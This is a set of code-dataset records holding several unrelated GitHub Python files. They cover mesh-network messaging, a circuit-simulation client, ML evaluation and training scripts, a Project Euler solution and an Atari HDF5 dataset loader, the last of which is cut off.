Stopping threads...')\n RUN=False\n al.stop()\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# ----------------------------------------------------------------------------------------------\ndef getMac(device: str): #print(getMac(\"mesh-bridge\"))\n cmd='ifconfig |grep \"'+device+'\" -A 5|grep -o \"ether.*\" |cut -d \" \" -f 2'\n p=subprocess.check_output(cmd, shell=True)\n return p.decode().rstrip(\"\\n\")\n\ndef getIp4(device: str): #print(getIp4(\"bat0\"))\n cmd='ifconfig |grep \"'+device+'\" -A 5|grep -o \"inet .*\"|cut -d \" \" -f 2'\n p=subprocess.check_output(cmd, shell=True)\n return p.decode().rstrip(\"\\n\")\n\ndef getIp6(device: str): #print(getIp4(\"bat0\")) #print(getIp6(\"bat0\")[0])\n cmd='ifconfig |grep \"'+device+'\" -A 5|grep -o \"inet6 .*\"|cut -d \" \" -f 2'\n p=subprocess.check_output(cmd, shell=True)\n addrs=p.decode().split(\"\\n\")[:-1]\n if len(addrs)>0:\n return addrs #return type is list\n else:\n return [\"0\"] #no ipv4 addrs to return!\n# ----------------------------------------------------------------------------------------------\n\n# ----------------------------------------------------------------------------------------------\nclass AlfredReceiver:\n def __init__(self, callback):\n try:\n p=subprocess.check_output([\"pgrep\",\"alfred\"])\n except:\n print(\"alfred not running! Please run mesh.py first.\")\n quit()\n self.callback=callback\n self.run=True\n t=threading.Thread(target=self.__receiver)\n t.start()\n\n def __receiver(self):\n while self.run:\n for ch in CHANNELS:\n cmd='sudo alfred -r '+str(ch)\n p=subprocess.check_output(cmd.split(' ')) # p <- { \"22:54:99:cc:14:05\", \"pia Testi 255\" },\n if len(p)>0:\n lines=p.decode().split(\"\\n\")\n for line in lines:\n if len(line)>0:\n #print(\"LINE\",line)\n data=line.split(\",\")[:2]\n sender = data[0].split('\"')[1]\n msg = data[1].split('\"')[1]\n key = sender + \"_\" + str(ch) #key 22:54:99:cc:14:05_253 address_channel\n if MSGDICT.get(key) is None or MSGDICT.get(key) !=(ch,msg):\n MSGDICT[key]=(ch,msg)\n #print(MSGDICT)\n if self.callback is not None:\n self.callback(sender, ch, msg)\n for i in range(0,5):\n if not self.run:\n break\n time.sleep(1)\n\n def send(self, channel, message):\n cmd='echo -n \"'+message+'\" | sudo alfred -s '+str(channel)\n os.system(cmd)\n\n def stop(self):\n self.run=False\n# ----------------------------------------------------------------------------------------------\n\n\ndef cback(sender,channel, msg): #callback when new data (changed) in alfdred\n print(\"MSG:\", sender, channel, msg)\n\n# ----------------------------------------------------------------------------------------------\nif __name__ == \"__main__\":\n k=0\n if len(sys.argv)>=2: #./alfredmsg.py 255 test message\n al=AlfredReceiver(None)\n ch=sys.argv[1]\n msg=\" \".join(sys.argv[2:])\n al.send(ch, msg)\n #time.sleep(1)\n al.stop()\n quit()\n\n else: #./alfredmsg.py\n al=AlfredReceiver(cback)\n while RUN:\n k+=1\n #print(\"main\", RUN)\n time.sleep(1)\n # if k==5:\n # al.send(255, \"Tama on testi\")\n # if k==2:\n # print(getMac(\"mesh-bridge\"))\n # print(getIp4(\"bat0\"))\n # print(getIp6(\"bat0\")[0])\n\n","repo_name":"janttari/raspberry-mesh","sub_path":"alfredmsg.py","file_name":"alfredmsg.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23368661114","text":"import json\nimport requests\nimport multiprocessing as mp\nfrom multiprocessing import Pool\nimport numpy as np\nimport 
time\n\nclass Indep_test:\n\n serverUrl = \"\"\n\n def __init__(self, serverUrl):\n Indep_test.serverUrl=serverUrl\n\n def createNewSimulation(self):\n payload = \"\"\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n url = Indep_test.serverUrl + \"simulations\"\n\n payload = \"\"\n\n response = requests.request(\"POST\", url, data=payload, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n # Load circuit represented by graph from uploaded JSON file\n def loadCircuitFromGraphString(self, key, jsonString):\n files = {'file': ('circuit.json', jsonString)}\n\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/loadCircuitFromGraph\"\n\n response = requests.request(\"POST\", url, files=files)\n\n return json.loads(json.dumps(response.text))\n\n def startForAndWait(self,key,seconds):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/startForAndWait\"\n querystring = {\"seconds\": seconds}\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.post(url, headers=headers, params=querystring)\n\n return json.loads(json.dumps(response.text))\n\n # Starts simulation for specified period of simulated circuit seconds and returns immediately\n def startFor(self, key, seconds):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/start\"\n querystring = {\"seconds\": seconds}\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.post(url, headers=headers, params=querystring)\n\n return json.loads(json.dumps(response.text))\n\n def kill(self,key):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/kill\"\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.post(url, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n # Changes specified element property to a given value\n def setElementProperty(self,key,elementId, propertyKey, newValue):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/element/\" + elementId+\"/property\"\n querystring = {\"propertyKey\": propertyKey,\"newValue\":newValue}\n\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.patch(url, headers=headers, params=querystring)\n\n return json.loads(json.dumps(response.text))\n\n # Returns simulation time when last measurement was performed\n def peekTime(self, key):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/peekTime\"\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.request(\"POST\", url, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n # Returns simulation time when last measurement was performed\n def time(self, key):\n url = Indep_test.serverUrl + \"simulations/\" + key + \"/time\"\n headers = {\n 'content-type': \"application/json\",\n 'accept': \"application/json\"\n }\n\n response = requests.request(\"POST\", url, headers=headers)\n\n return json.loads(json.dumps(response.text))\n\n\ndef atomic_sim(n):\n\n utils = Indep_test(serverUrl=\"http://localhost:8090/symphony/\");\n response = utils.createNewSimulation()\n key = json.loads(response)[\"key\"]\n\n jsoncontent = json.dumps(json.load(open(\"/home/nifrick/PycharmProjects/ressymphony/nonlinear_memrist_test.json\")))\n\n inputids = [201, 202]\n outputids = [203, 205, 207, 209, 211, 213, 215, 217]\n\n response = 
utils.loadCircuitFromGraphString(key, jsoncontent)\n utils.setElementProperty(key, str(inputids[0]), \"maxVoltage\",str(np.random.randint(20)))\n utils.setElementProperty(key, str(inputids[1]), \"maxVoltage\", str(np.random.randint(20)))\n response = utils.startFor(key, 40)\n\n print(\"Fallin sleep\", utils.time(key))\n steps = 20\n start = time.time()\n for i in range(steps):\n time.sleep(0.5)\n print(utils.time(key))\n\n time.sleep(10)\n print(\"Total time per step\",time.time()-start,utils.time(key))\n utils.kill(key)\n\n return None\n\ndef main():\n N_parr=10\n\n p=Pool(N_parr)\n p.map(atomic_sim,list(range(40)))\n # with mp.pool.ThreadPool(processes=N_parr) as pool:\n # outvals = pool.map(atomic_sim,2)\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nfrik/ResSymphony","sub_path":"standalone/indep_test.py","file_name":"indep_test.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"70775075715","text":"import unittest\nfrom parameterized import parameterized, parameterized_class\nfrom testsuite.acquisition_functions import saf_mu\nfrom testsuite.surrogates import GP, RF\nimport numpy as np\n\n\n@parameterized_class([\n {\"name\": \"GP\", \"surrogate\": GP, \"args\": [],\n \"kwargs\": {\"scaled\": True}},\n {\"name\": \"RF\", \"surrogate\": RF, \"args\": [],\n \"kwargs\": {\"extra_trees\": True}},\n])\nclass TestSAFMethods(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.surr = cls.surrogate(*cls.args, **cls.kwargs)\n cls.x = np.random.uniform(0, 1, size=[10, 5])\n cls.y = np.random.uniform(0, 5, size=[10, 2])\n\n cls.surr.update(cls.x, cls.y)\n\n @parameterized.expand([\n (saf_mu, )\n ])\n def test_returns(self, acq):\n # test single evaluations of acquisition function\n x_put = np.random.uniform(0,1, size=self.x[0:1].shape)\n ans = acq(x_put, self.surr, self.y)\n self.assertIsInstance(ans, np.ndarray)\n self.assertEqual(ans.shape[0], x_put.shape[0])\n\n # test multiple evaluations of acquisition function\n x_put = np.random.uniform(0,1, size=self.x[0:5].shape)\n ans = acq(x_put, self.surr, self.y)\n self.assertIsInstance(ans, np.ndarray)\n self.assertEqual(ans.shape[0], x_put.shape[0])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"FinleyGibson/dsaf_code","sub_path":"test/test_acquisition_functions.py","file_name":"test_acquisition_functions.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26114373641","text":"import pandas as pd\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\n\nfrom transformers import Wav2Vec2Processor, Wav2Vec2Model\nfrom sentence_transformers import SentenceTransformer\n\nfrom utils.custom_datasets import AnnotationsDataset\nfrom utils.helper_functions import sentence_features_to_device\nfrom utils.speaker_encoder import SpeakerEncoder\n\ndef eval_encoders(hparams):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n print(f'Use CUDA: {hparams[\"use_cuda\"]}')\n\n text_model = SentenceTransformer(hparams[\"sbert_model\"], device=device)\n text_model = text_model.to(device=device)\n text_model.load_state_dict(torch.load(hparams[\"sbert_checkpoint\"], map_location=device)[\"state_dict\"])\n\n processor = Wav2Vec2Processor.from_pretrained(hparams[\"wav2vec2_model\"])\n wav2vec2 = Wav2Vec2Model.from_pretrained(hparams[\"wav2vec2_model\"]).to(device)\n 
audio_model = SpeakerEncoder(wav2vec2, processor, hparams, device).to(device)\n audio_model.load_state_dict(torch.load(hparams[\"wav2vec2_checkpoint\"], map_location=device)[\"state_dict\"])\n\n def collate_fn(batch):\n audio_paths = []\n sentence_features = []\n labels = []\n\n for example in batch:\n audio_path = example[0]\n audio_paths.append(audio_path)\n\n text = example[1]\n sentence_features.append(text)\n\n label = example[2]\n labels.append(label)\n\n labels = torch.tensor(labels, dtype=torch.float32).to(device=device)\n\n return audio_paths, sentence_features, labels\n\n\n test_dataframe = pd.read_csv(hparams[\"annotations_CS_df_dir\"], index_col=0).reset_index(drop=True)\n test_dataframe.dropna(inplace=True)\n test_dataframe = test_dataframe.reset_index(drop=True)\n\n print(\"test_dataframe length:\", len(test_dataframe))\n\n test_dataloader = DataLoader(AnnotationsDataset(test_dataframe, text_model, device, hparams), \n batch_size=1, shuffle=True, collate_fn=collate_fn)\n\n criterion = nn.L1Loss()\n criterion = criterion.to(device=device)\n\n loss_list = []\n\n criterion.eval()\n audio_model.eval()\n text_model.eval()\n with torch.no_grad():\n running_val_loss = 0\n for i, (audio, sentence_features, similarity) in enumerate(test_dataloader):\n sentence_features = list(map(lambda batch: sentence_features_to_device(batch, device), sentence_features))\n\n vec_1 = audio_model(audio)\n vec_2 = torch.cat([text_model(sentence_feature)['sentence_embedding'] for sentence_feature in sentence_features])\n cos = torch.cosine_similarity(vec_1, vec_2)\n loss = criterion(cos, similarity)\n running_val_loss += loss.item()\n loss_list.append(loss.item())\n print(similarity, cos, loss.item())\n\n avg_val_loss = running_val_loss/(i+1)\n print(f\"Average Loss: {avg_val_loss}\")\n\n print(\"loss_list length:\", len(loss_list))\n \n test_dataframe['loss'] = loss_list\n test_dataframe.to_csv(\"annotations_control_samples_positive_loss.csv\")","repo_name":"TartuNLP/speaker-CLAP","sub_path":"eval_encoders.py","file_name":"eval_encoders.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24962348864","text":"\nfrom os import listdir\nfrom os.path import isfile, join\n\n\npath_webiste='./website/'\n\n# https://stackoverflow.com/questions/3207219/how-do-i-list-all-files-of-a-directory\nonlyfiles = [f for f in listdir(path_webiste) if isfile(join(path_webiste, f)) and 'phobius' not in f ]\n\n\nheader='Home
'\n\nsearch_box='\n\n\t\t\n\t\t\t\n\t\t\t\tLookup String: \n\t\t\t\t\n\t\t\t\n\t\t\n\n'\n\nfor file_html in onlyfiles:\n\tpage=open(path_webiste+file_html,'r').read()\n\tpage=page.replace('#banner { background: #bdbdbd; height:200px;','#banner { background: #bdbdbd; height:225px;')\n\tpage=page.replace(header,header+search_box)\n\topen(path_webiste+file_html,'w').write(page)\n\n\n############################################################\n\n\nfor file_html in onlyfiles:\n\thog=file_html.split('.')[0]\n\tprint(hog)\n\t# get link for GitHub suggestion\n\turl_aybrah='https://kcorreia.github.io/aybrah/website/'+hog+'.html'\n\turl_github='https://github.com/kcorreia/aybrah/issues/new?body=%23%20Description%20of%20the%20issue%0A%0A%0A%0A%23%20Page%0A'+url_aybrah\n\tpage=open(path_webiste+file_html,'r').read()\n\tpage=page.replace('',''+hog+'')\n\tpage=page.replace('#banner { background: #bdbdbd; height:225px;','#banner { background: #bdbdbd; height:265px;')\n\tpage=page.replace('Phobius predictions','Phobius predictions
\\n'+'\\t'*17+'Report suggestion on GitHub')\n\topen(path_webiste+file_html,'w').write(page)\n\n\n\n\n\n","repo_name":"LMSE/aybrah","sub_path":"scripts/update_hog_webpage.py","file_name":"update_hog_webpage.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"21449803354","text":"#reading h5 file\nimport numpy as np\nimport h5py\n \n \ndef load_dataset():\n train_dataset = h5py.File('drive/My Drive/train_catvnoncat.h5', \"r\")\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:]) # your train set features\n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:]) # your train set labels\n\n test_dataset = h5py.File('drive/My Drive/test_catvnoncat.h5', \"r\")\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:]) # your test set features\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:]) # your test set labels\n\n classes = np.array(test_dataset[\"list_classes\"][:]) # the list of classes\n \n train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n \n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n \ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n \nm_train=train_set_x_orig.shape[0] #num of training examples\nm_test=test_set_x_orig.shape[0] #no. of test exapmples\nnum_px=train_set_x_orig.shape[1] #width of training ex (width of image )\n\nprint(\"Num of training examples : \",m_train)\nprint(\"Num of test examples : \",m_test)\nprint(\"Num of training labels : \",num_px)\nprint (\"Each image is of size: (\" + str(num_px) + \", \" + str(num_px) + \", 3)\")\nprint(\"shape of train__set\",train_set_x_orig.shape)\nprint(\"shape of train_Y_set\",train_set_y.shape)\nprint(\"shape of test__set\",test_set_x_orig.shape)\n\n#Now reshape the training examples\ntrain_x_flatten=train_set_x_orig.reshape(train_set_x_orig.shape[0],-1).T #create a matrix of nx(64x64x3) X m\ntest_x_flatten=test_set_x_orig.reshape(test_set_x_orig.shape[0],-1).T\n\nprint (\"train_set_x_flatten shape: \" + str(train_x_flatten.shape))\nprint (\"train_set_y shape: \" + str(train_set_y.shape))\nprint (\"test_set_x_flatten shape: \" + str(test_x_flatten.shape))\nprint (\"test_set_y shape: \" + str(test_set_y.shape))\n\ntrain_set_x = train_x_flatten/255. 
#to standardize the pixel values\ntest_set_x = test_x_flatten/255.\n\n# GRADED FUNCTION: sigmoid\n\ndef sigmoid(z):\n\n\n s =1/(1+np.exp(-z))\n\n \n return s\n \n # initialize_with_zeros\ndef initialize(dim):\n \n \n \n w = np.random.randn(dim,1)*0.1\n b = 0\n \n\n assert(w.shape == (dim, 1))\n assert(isinstance(b, float) or isinstance(b, int))\n \n return w, b\n \ndef propagate(w, b, X, Y):\n\n \n m = X.shape[1]\n \n \n A = sigmoid(np.dot(w.T,X)+b) # compute activation\n cost =(-1/m) *(np.sum(Y*np.log(A)+(1-Y)*np.log(1-A))) # compute cost\n \n \n # BACKWARD PROPAGATION (TO FIND GRAD)\n \n dw =(1/m)*np.dot(X,(A-Y).T)\n db = (1/m)*(np.sum(A-Y))\n \n\n assert(dw.shape == w.shape) #assert=>to make sure of dimensions are correct\n assert(db.dtype == float)\n cost = np.squeeze(cost)\n assert(cost.shape == ())\n \n grads = {\"dw\": dw,\n \"db\": db}\n \n return grads, cost\n \ndef optimize(w, b, X, Y, num_iterations, learning_rate, print_cost = False):\n\n \n costs = []\n \n for i in range(num_iterations):\n \n \n # Cost and gradient calculation (≈ 1-4 lines of code)\n \n grads, cost =propagate(w,b,X,Y)\n \n \n # Retrieve derivatives from grads\n dw = grads[\"dw\"]\n db = grads[\"db\"]\n \n # update rule (≈ 2 lines of code)\n \n w =w-learning_rate*dw\n b =b-learning_rate*db\n \n \n # Record the costs\n if i % 100 == 0:\n costs.append(cost)\n \n # Print the cost every 100 training iterations\n if print_cost and i % 100 == 0:\n print (\"Cost after iteration %i: %f\" %(i, cost))\n \n params = {\"w\": w,\n \"b\": b}\n \n grads = {\"dw\": dw,\n \"db\": db}\n \n return params, grads, costs\n \ndef predict(w, b, X):\n \n m = X.shape[1]\n Y_prediction = np.zeros((1,m))\n w = w.reshape(X.shape[0], 1)\n \n # Compute vector \"A\" predicting the probabilities of a cat being present in the picture\n\n A = sigmoid(np.dot(w.T,X)+b)\n \n \n for i in range(A.shape[1]):\n \n # Convert probabilities A[0,i] to actual predictions p[0,i]\n \n Y_prediction[0,i]=1 if A[0,i]>0.5 else 0\n\n \n assert(Y_prediction.shape == (1, m))\n \n return Y_prediction\n \n \ndef model(X_train, Y_train, X_test, Y_test, num_iterations = 2000, learning_rate = 0.5, print_cost = False):\n\n # d -- dictionary containing information about the model.\n \n \n \n \n # initialize parameters with zeros\n w, b = initialize_with_zeros(X_train.shape[0])\n\n # Gradient descent \n parameters, grads, costs = optimize(w,b,X_train,Y_train,num_iterations,learning_rate,print_cost)\n \n # Retrieve parameters w and b from dictionary \"parameters\"\n w = parameters[\"w\"]\n b = parameters[\"b\"]\n \n # Predict test/train set examples \n Y_prediction_test = predict(w,b,X_test)\n Y_prediction_train = predict(w,b,X_train)\n\n \n\n # Print train/test Errors\n print(\"train accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_train - Y_train)) * 100))\n print(\"test accuracy: {} %\".format(100 - np.mean(np.abs(Y_prediction_test - Y_test)) * 100))\n\n \n d = {\"costs\": costs,\n \"Y_prediction_test\": Y_prediction_test, \n \"Y_prediction_train\" : Y_prediction_train, \n \"w\" : w, \n \"b\" : b,\n \"learning_rate\" : learning_rate,\n \"num_iterations\": num_iterations}\n \n return d\n \nd = model(train_set_x, train_set_y, test_set_x, test_set_y, num_iterations = 2000, learning_rate = 0.005, print_cost = True)\n","repo_name":"Nagrajpawar05/Logistic_regression_NN_mindset","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"5845995606","text":"\"\"\"\n\nWhat is the sum of the digits of the number 2**N?\n\n\"\"\"\n\ndef digits_sum(n):\n pn = 2**n\n return sum(int(ch) for ch in str(pn))\n\n\ndef hacker_main():\n t = int(input())\n for _ in range(t):\n n = int(input())\n result = digits_sum(n)\n print(result)\n\n\n# print(digits_sum(1000))\nhacker_main()","repo_name":"mqq-marek/ProjectEuler","sub_path":"ProjectEuler/Problems_001_050/P016_PowerDigitSum.py","file_name":"P016_PowerDigitSum.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40069197871","text":"from abc import ABC\nfrom math import ceil, floor\nfrom typing import Union, Optional, Any, List\n\nimport pytorch_lightning as pl\nimport torch\nimport torch.utils\nfrom rich.progress import track, Progress\nfrom torch.utils.data import DataLoader\nfrom argparse import ArgumentParser\n\nimport buffer_h5 as b5\nfrom sampler import SamplerFactory\nimport numpy as np\nfrom torchvision import transforms\nfrom transforms import GaussianBlur\nimport h5py as h5\nfrom time import time\nimport math\n\nclass H5NextStateReward(b5.Buffer, torch.utils.data.Dataset, ABC):\n REWARD_NEG: int = 0\n REWARD_POS: int = 1\n\n def __init__(self):\n super().__init__()\n self.transforms = None\n self.classes = []\n self.image_shape = None\n self.image_dtype = None\n self.class_index = None\n self.reward_causality_distance = 5\n\n def load(self, filename, mode='r', cache_bytes=1073741824, cache_slots=100000, cache_w0=0.0, reward_causality_distance=5):\n super().load(filename, mode, cache_bytes, cache_slots, cache_w0)\n self.reward_causality_distance = reward_causality_distance\n self.classes = np.zeros(self.steps, dtype=np.int64)\n initials = self.episodes[:self.num_episodes]\n initials_mask = np.zeros(self.steps, dtype=np.uint8)\n initials_mask[initials] = 1\n initials_mask = initials_mask.astype(np.bool_)\n reward_pos_mask = self.reward[:self.steps] > 0.0\n self.image_shape = *self.f['/replay/raw'].shape[1:3], self.f['/replay/raw'].shape[3]*2\n self.image_dtype = self.f['/replay/raw'].dtype\n\n \"\"\"\n When we hit a reward, flag the states that lead up to it as rewarding\n but not if they are from a different trajectory!\n \"\"\"\n counter = 0\n for i in track(reversed(range(self.steps)), total=self.steps, description='[blue]indexing'):\n r = reward_pos_mask[i]\n initial = initials_mask[i]\n if r:\n counter = reward_causality_distance + 1\n if counter > 0:\n reward_pos_mask[i] = True\n if initial:\n counter = 0\n else:\n counter -= 1\n\n rewards_pos, = np.where(reward_pos_mask)\n rewards_neg, = np.where(reward_pos_mask == False)\n self.classes = reward_pos_mask.astype(dtype=np.int64)\n self.class_index = [rewards_neg, rewards_pos]\n\n def make_stat_table(self):\n table = super().make_stat_table()\n table.add_row(\"Reward causality distance\", f'{self.reward_causality_distance}')\n table.add_row(\"Labeled reward_pos\", f\"{np.count_nonzero(self.classes)}\")\n return table\n\n def __len__(self):\n return self.n_gram_len(gram_len=1)\n\n def __getitem__(self, item):\n raw = self.raw[item]\n grad = self.replay['grad'][item]\n image = np.concatenate((raw, grad), axis=2)\n x = self.transforms(image)\n label = self.classes[item]\n return x, label\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return 2\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return ['non-reward', 'reward']\n\n\nclass 
PolicyActionLabels(b5.Buffer, torch.utils.data.Dataset, ABC):\n def __init__(self):\n super().__init__()\n self.transforms = None\n self.classes = None\n self.class_index = None\n self.image_shape = None\n self.image_dtype = None\n\n def build_class_index(self):\n with Progress() as p:\n task = p.add_task(description='[blue] indexing ...', total=self.steps)\n idx = [[] for _ in range(self.num_classes)]\n for i in range(self.steps):\n idx[self.action[i]].append(i)\n p.update(task, total=self.steps, advance=1)\n return idx\n\n def load(self, filename, mode='r', cache_bytes=1073741824, cache_slots=100000, cache_w0=0.0, reward_causality_distance=5):\n super().load(filename, mode, cache_bytes, cache_slots, cache_w0)\n self.classes = self.action[:]\n self.class_index = self.build_class_index()\n self.image_shape = *self.f['/replay/raw'].shape[1:3], self.f['/replay/raw'].shape[3]*2\n self.image_dtype = self.f['/replay/raw'].dtype\n\n def make_stat_table(self):\n table = super().make_stat_table()\n return table\n\n def __len__(self):\n return self.n_gram_len(gram_len=1)\n\n def __getitem__(self, item):\n raw = self.raw[item]\n grad = self.replay['grad'][item]\n image = np.concatenate((raw, grad), axis=2)\n x = self.transforms(image)\n action = self.classes[item]\n return x, action\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return 4\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return ['NOP', 'FIRE', 'RIGHT', 'LEFT']\n\n\ndef split_index(class_index):\n \"\"\"\n\n :param class_index: nested lists of indexes of each class\n ie for classes\n labels = [1, 2, 0, 1, 2, 0, 0]\n class_index = [[2, 5, 6], [0, 3], [1, 4]]\n :return: test and validation splits with same proportion of clesses, in same format as class_index\n \"\"\"\n train, val = [], []\n for i in range(len(class_index)):\n class_i = class_index[i]\n train.append(class_i[:ceil(len(class_i) * 0.8)])\n val.append(class_i[floor(len(class_i) * 0.8):])\n return train, val\n\n\ndef write_samples(group, dataset, class_dict, class_index, image_shape, chunk_size, num_chunks, compression,\n compression_opts):\n\n sampler = SamplerFactory().get(\n class_idxs=class_index,\n batch_size=chunk_size,\n n_batches=num_chunks,\n alpha=0.5,\n kind='fixed'\n )\n\n len = chunk_size * num_chunks\n\n group.create_dataset('image',\n shape=(len, *dataset.image_shape),\n chunks=(chunk_size, *dataset.image_shape),\n dtype=dataset.image_dtype,\n compression=compression,\n compression_opts=compression_opts,\n shuffle=False\n )\n group.create_dataset('label',\n shape=(len,),\n chunks=(chunk_size,),\n dtype=h5.enum_dtype(class_dict, basetype=np.int64),\n compression=compression,\n compression_opts=compression_opts,\n shuffle=False\n )\n\n with Progress() as p:\n task = p.add_task(description=f'[red] writing {group.name}', total=num_chunks)\n for i, (image, cls) in enumerate(DataLoader(dataset, batch_sampler=sampler, num_workers=0)):\n offset = i * chunk_size\n group['image'][offset:offset + chunk_size] = image.numpy()\n group['label'][offset:offset + chunk_size] = cls.numpy()\n p.update(task, total=num_chunks, advance=1)\n\n\ndef write_balanced_splits(dataset, dest_filename, class_dict, chunk_size, num_chunks, compression, compression_opts):\n\n train_class_index, val_class_index = split_index(dataset.class_index)\n f = h5.File(dest_filename, mode='w')\n train = f.create_group('train')\n write_samples(train, dataset, class_dict, train_class_index, dataset.image_shape, chunk_size, num_chunks, 
compression,\n compression_opts)\n val = f.create_group('val')\n write_samples(val, dataset, class_dict, val_class_index, dataset.image_shape, chunk_size, num_chunks // 10, compression,\n compression_opts)\n\n\nclass H5ImageLabelIterableDataset(torch.utils.data.IterableDataset):\n def __init__(self, filename, group, transform, batch_size, num_workers):\n \"\"\"\n\n :param filename:\n :param group: 'train' or 'val' will load train or validation set respectively\n :param transform:\n :param batch_size:\n \"\"\"\n super().__init__()\n self.filename = filename\n self.group = group\n self.f = h5.File(self.filename, mode='r')\n self.offset = 0\n self.batch_size = batch_size\n self.transform = transform\n self.num_workers = num_workers\n\n def __iter__(self):\n return self\n\n def __next__(self):\n g = self.f[self.group]\n\n start = self.offset\n end = self.offset + self.batch_size\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is None: # single-process data loading, return the full iterator\n iter_start = start\n iter_end = end\n else: # in a worker process\n # split workload\n per_worker = int(math.ceil((end - start) / float(worker_info.num_workers)))\n worker_id = worker_info.id\n iter_start = start + worker_id * per_worker\n iter_end = min(iter_start + per_worker, end)\n\n start = time()\n images = g['image'][iter_start:iter_end]\n labels = g['label'][iter_start:iter_end]\n load = time()\n images = list(zip(*[self.transform(image) for image in images]))\n x = tuple([torch.stack(items) for items in images])\n transform = time()\n #print(f'start: {iter_start} end:{iter_end} load: {load-start} transform: {transform-load}')\n self.offset += self.batch_size\n if self.offset > len(g['image']):\n raise StopIteration\n return x, labels\n\n def __len__(self):\n # because we the batch size in the loader == the number of workers\n # we must fist multiply be the number of workers then divide by the actual batch size\n # (yes this is confusing)\n g = self.f[self.group]\n return len(g['label']) * self.num_workers // self.batch_size\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return len(self.name_classes)\n\n @property\n def name_classes(self) -> List[str]:\n with h5.File(self.filename, mode='r') as f:\n g = f[self.group]\n return list(g['label'].dtype.metadata['enum'])\n\n\nclass H5ImageLabelDataset(torch.utils.data.Dataset):\n def __init__(self, filename, group, transform, batch_size):\n \"\"\"\n\n :param filename:\n :param group: 'train' or 'val' will load train or validation set respectively\n :param transform:\n :param batch_size: not used\n \"\"\"\n super().__init__()\n self.filename = filename\n self.f = h5.File(filename, mode='r')\n self.g = self.f[group]\n self.offset = 0\n self.transform = transform\n\n def __getitem__(self, item):\n start = time()\n image = self.g['image'][item]\n label = self.g['label'][item]\n fetch = time()\n x = self.transform(image)\n transform = time()\n #print(fetch-start, transform-fetch)\n return x, label\n\n def __len__(self):\n return len(self.g['label'])\n\n @property\n def num_classes(self) -> int:\n \"\"\"\n Return:\n 10\n \"\"\"\n return len(self.name_classes)\n\n @property\n def name_classes(self) -> List[str]:\n \"\"\"\n Return:\n 10\n \"\"\"\n return list(self.g['label'].dtype.metadata['enum'])\n\n\nclass AtariDataModule(pl.LightningDataModule):\n def __init__(self, filename, train_transforms, val_transforms, test_transforms,\n val_split: Union[int, float] = 0.2,\n num_workers: int = 0,\n normalize: bool 
